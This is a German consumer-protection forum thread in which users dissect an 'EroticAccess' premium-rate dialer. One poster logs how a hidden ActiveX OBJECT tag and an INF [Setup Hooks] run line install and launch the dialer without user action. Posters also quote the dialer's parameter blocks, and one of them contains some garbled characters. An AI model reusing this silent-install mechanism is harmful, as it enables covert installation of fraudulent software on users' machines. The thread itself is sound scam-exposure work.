Ein Sachverständigengutachten zum Thema Dialer

Aktueller TTW Dialer

Ganz sauber ist das mit dem aktuellen TTW Dialer auch nicht.

Es stellt sich aktuell so dar, dass man bei TTW auf Icons clickt, die Gratisinahlte versprechen. Offensichtlich hat TTW einen Pool von Links zur Auswahl. Scheinbar zufällig werden die Links dann ausgewählt.

Zeitlich bei meinem Versuch von gerade
Code: 
22:30:01 Uhr: Eine Seite, wo der Kunde durch eine 'Sicherheitswarnung' von Windows auf die Installation und Ausführung eines 'Browser-Plugins' von TTW hingewiesen wird (wobei der Begriff 'Browser-Plugin' von TTW ins das Zertifikat geschrieben wird) erscheint. Das Zertifikat erscheint erst am Ende des Ladevorgangs, weil es als letztes geladen wird. Es erscheint nicht, wenn der Kunde in den Sicherheitseinstellungen des IE in der Zone Internet den Download von signierten ActiveX Steuerelementen ohne Nachfrage zuläßt:

22:30:02 Uhr: Der Object Tag, der dem IE mitteilt, wie er die ActiveX Komponenten zu installieren hat, wird geladen. Seine Anzeige wird verborgen (styles=display:hidden).
22:30:04 Uhr: Das Download der CAB-Datei beginnt
22:30:09 Uhr: CAB Datei ist heruntergeladen. Das Zertifikat wird als letztes geladen.
22:30:10 Uhr: Ordner F:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temp\ICD1.tmp wird erstellt und der Inhalt des CABs wird dort hineinkopiert, dh der Dialer EroticAccess.exe und einige weitere Dateien
22:30:10: Der Dialer wird über Internet Explorer gestartet (ohne mein Zutun).
22:30:11: Eine neue Instanz des IE wird vom Dialer gestartet
22:30:11: Dem Dialer wird folgender Datensatz übertragen:
{PHONENUMBER="0190061290",USERID="1694325@teleteam",
PASSWORD="comein",DOMAIN="",
URL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxx[/color]",
ALT_PHONENUMBER="01938775057",ALT_USERID="1694325@teleteam",
ALT_PASSWORD="comein",ALT_DOMAIN="",
ALT_URL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxxx[/color]",
TERTIARY_PHONENUMBER="TEMPLATE",
TERTIARY_USERID="1694325@teleteam",
TERTIARY_PASSWORD="comein",TERTIARY_DOMAIN="",
TERTIARY_URL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxx[/color],
DOWNLOADURL="http://www.eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxx[/color],
FAILUREURL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxx[/color]",
STARTURL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxx[/color],
DIALINGURL="http://www.Eingang69[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx[/color]",
CLEARINGURL="",ACCESSURL="http://www.[color=red]sexxxxxxxxxxxxxxxxx[/color]/",
NOACCESSURL="http://www.[color=red]xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[/color]",
DIALERTYPE="1",
ENABLE_DOWNLOAD_SHORTCUT="1",UNIT_PRICE="299",
INITIAL_UNIT_PRICE="2999",SHORTCUT="Wobz",SHORTCUT_DE
E  `€>@ wÕP?‘þÊy P· ¢*ÿ²jÚ¦Pú?£d  SCRIPTION="Hier findest du
Alles!!!"BILLING_TIMEOUT="",}

Nachdem man den Download des Plugins bestätigt hat, gelangt man zum Disclaimer. Der Schritt entfällt, wenn der Download von signierten Steuerelementen in den Sicherheitseinstellungen ohne Bestätigung zugelassen ist. Dann geht alles vollautomatisch.

22:30:13: Disclaimer erscheint
Dort wird man am unteren Rand des Bildes kleingedruckt auf Kosten von 29,99 EUR pro Einwahl zzgl 2,99 EUR je weiterer Minute hingewiesen. Bei kleineren Monitoren ist dieser Zusatz nicht ohne Scrollen sichtbar

Klickt man dann auf den Button 'Sex-Access', dann beginnt ein Countdown von 100s. Bereits nach wenigen Sekunden wird die Verbindung getrennt und der Dialer wählt an.

Erläuterung des Autodownloads und Autostartmechanismus:

Code: 
Dazu wird folgender Object Tag verwendet:

"<OBJECT height=0 width=0 styles=display:hidden classid=clsid:1230cb21-c88d-11cf-b347-000000000000 codebase=/EroticAccessxxx/[email protected]></object>"

Der Download Prozess

Das System arbeitet wie folgt,  wenn es eine den Inhlt einer .cab -Datei auf den Computer des Kunden kopiert

   1. Der Browser prüft die Registry auf die  Class ID im OBJECT tag. Wenn sie nicht gefunden wird, wird das CODEBASE Attribut verarbeitet. Wenn der Browser die  Class ID finder, wird die Datei, die über den Eintrag in der Registry referenziert wird geprüft, um zu sehen, ob sie aktuell ist. Ist sie das nicht, wird der Download ebenfalls fortgesetzt.

   2. Der Browser lädt die richtige .cab Datei herunter und entpackt sie in ein temporäres Verzeichnis

   3. Der Browser verarbeitet die zur cab. Datei gehörendene .inf Datei.

Dies ist die Installer.Inf:

"[Setup Hooks]
hook1=hook1
[hook1]
run=%EXTRACT_DIR%\EroticAccess.exe
FileVersion=1,0,0,4
[Version]
Signature=$CHICAGO$
AdvancedInf=2.0"

4. Zunächst wird der [Setup Hooks] Abschnitt vom IE verarbeitet. Die Zeile hook1=hook1 bewirkt, dass der Abschnitt [hook1] immer ausgeführt wird. Folglich ruft der IE dann über den Befehl 'run' im Abschnitt [Hook1] den Dialer auf. Ohne Zutun des Nutzers.

Der Mechanismus dient normalerweise dazu, Setup-Programme aufzurufen und wird hier für einen Autodialer missbraucht.

Mein Fazit:

Code: 
* Der Download startet automatisch durch Click auf ein 'Gratis Bild'
* Die Installation läuft ohne bewusste Steuerung des Kunden ab
*Die Installation läuft im Hintergrund ab. Der Kunde wird nur über die Installation eines 'Browser-Plugins' informiert (Tarnung als harmloses Plugin), und auch nur dann, wenn die Sicherheitseinstellungen des IE für die Zone 'Internet' im Punkt 'Download von signierten ActiveX Steuerelementen' auf 'Fragen' gesetzt ist. Keine Meldung erscheint, wenn der Download von signierten ActiveX generell zugelassen ist.
* Der Kunde wird nur versteckt darüber informiert, dass sein normaler Internetzugang beendet wird und ein höherer Preis fällig wird. Auf kleinen Monitoren ist sind die Hinweise ohne Scrollen nach unten nicht erkennbar.
Der Preis steht auch im Widerspruch zu der Erwartung eines 'Gratis Bild', die TTW vorher beim Kunden geweckt hat. 
* Der Webdialer kann vom ungeübten Surfer nicht, oder nur unter größten Schwierigkeiten wieder vom PC entfernt werden. Es gibt keine Deinstallationsroutine.

Gruß
Comedian


Links zu Dialerseiten und kommerziellen Angeboten entsprechend der NUB entfernt.
DevilFrank
 
@Comedian:
Bitte gib hier im Forum keine solchen Links ungekürzt an.
Wir haben hier auch Leute, die wir vor sich selber schützen müssen.

Neulich hat mich z.B. ein Dialeranbieter angerufen, der sich über einen Newsartikel beschweren wollte. Er kam darauf, nachdem er sich vor Traffic auf seiner Seite plötzlich nicht mehr retten konnte.
Ursache war offensichtlich, dass viele Besucher von Computerbetrug.de den (nicht aktiven!) Link in ihren Browser kopiert haben um nachzuschauen, ob das wirklich so gefährlich ist...

Diese kleine Anekdote soll verdeutlichen, warum wir hier nicht gerne Links in öffentlichen Artikeln haben. Bitte verschicke diese doch per PN oder Mail. Ich würde es nur sehr ungern sehen, dass wir durch Einträge im Forum auch noch Dialerumsätze generieren.
 
Der Jurist schrieb:
@ anna

Kann man da ein Aktenzeichen bekommen, wegen zivilgerichtlicher Seite.

Dort reichen Zweifel schon aus, um die Forderung erfolgreich zurückzuweisen.

Die StA bzw. die Pol. müsste bestätigen, dass möglicherweise auch ein faules Stück im Netz war.
Zum Vergrößern anklicken....

@Jurist

das war ja Grund unseres Telefonates vom Freitag - die Informationen suche ich am Dienstag zusammen und komme nächste Woche unaufgefordert auf das Thema zurück. Werde allerdings nicht posten sondern pn senden.
 
@ Comedian1

das ist ja sehr interessant. Kannst Du mir bitte die URL (´s) als pn zur Kenntnis geben?

Nachdem ich nicht ganz unschuldig daran war, dass TTW mit rund 100.000 verfügbaren Nummern bei Tl ID rausflog, schaue ich Herrn Bo J. genau auf die Seiten und dokumentiere möglichst alles, was ich kriegen kann - somit habe ich schon gewissen Ermittlungsvorsprung, noch bevor Geschädigte beim mir erscheinen.
Außerdem klüngel ich ein bisschen mit dem neuen Provider. Dieser hatte mir seine ganze Unterstützung im Falle des Missbrauchs zugesichert, von der wir alle zehren können.
 
@anna
Das Ende von TTW bei TL ist mir neu und erfreut mich sehr! :bussi:

@Comedian1
Meine Version (von 07.2002) scheint also veraltet?

params[1].htm
{PHONENUMBER="0190030037",
USERID="2051019",
PASSWORD="xxxxxs",
DOMAIN="",
URL="http://www.xxxxx.de/EroticAccess/redirect.asp?id=$DIALERID$&url=$ACCESSURL$",
ALT_PHONENUMBER="0190030037",
ALT_USERID="2051019",
ALT_PASSWORD="xxxxx",
ALT_DOMAIN="",
ALT_URL="http://www.xxxxx.de/Exxxxxs/redirect.asp?id=$DIALERID$&url=$ACCESSURL$",
BILLING_TIMEOUT="",
DIALERTYPE="1",
FAILUREURL="http://www.xxxxx.de/EroticAccess/t51/de/fehler.asp?id=$DIALERID$&url=$DOWNLOADURL$",
STARTURL="http://www.xxxxx.de/EroticAccess/t51/de/disclaimer.asp?id=$DIALERID$",
DIALINGURL="http://www.xxxxx.de/EroticAccess/t51/de/kontrol.asp?id=$DIALERID$",
CLEARINGURL="http://www.xxxxx.de/eroticaccess/clearing.asp?id=$DIALERID$&password=$PAGEPASSWORD$",
ACCESSURL="http://www.xxxxx.de/insite/adult/index.html?id=$DIALERID$&guid=$GUID$",
DOWNLOADURL="http://www.xxxxx.de/eroticaccess/t51/de/index.asp?id=$DIALERID$",
ENABLE_DOWNLOAD_SHORTCUT="1",SHORTCUT="Hard Core",
SHORTCUT_DESCRIPTION="Heisse Porno!!!"}

Mit meiner IE-Sicherheit 'niedrig' von Damals brauche ich mir
also Heute keine Vorwürfe zu machen, so gelinkt worden zu sein.

Die Stellungnahme meines RA auf die Klageschrift liegt ggw. dem
Richter vor und wir hoffen auf eine weise Entscheidung :-?

Allen viel Glück und einen erträglichen Sonnentag ! Ciao

URLs gelöscht, siehe NUB tf
 
Dynamische Webseiten von TTW

ForBi schrieb:
@anna
@Comedian1
Meine Version (von 07.2002) scheint also veraltet?
Zum Vergrößern anklicken....

Jeder Mitschnitt ist nur eine Momentaufnahme. Die Einstiegsseiten hatten bei jedem Zugriff ein anderes Aussehen (die Bilder wurden stets getauscht). Die Durchsicht des Snifferprotokolls und des HTML Quellcodes bestätigen, dass die Seiten dynamisch erzeugt werden (mittels Adobe GoLive 6).

Gruß
Comedian
 
Zurück
Oben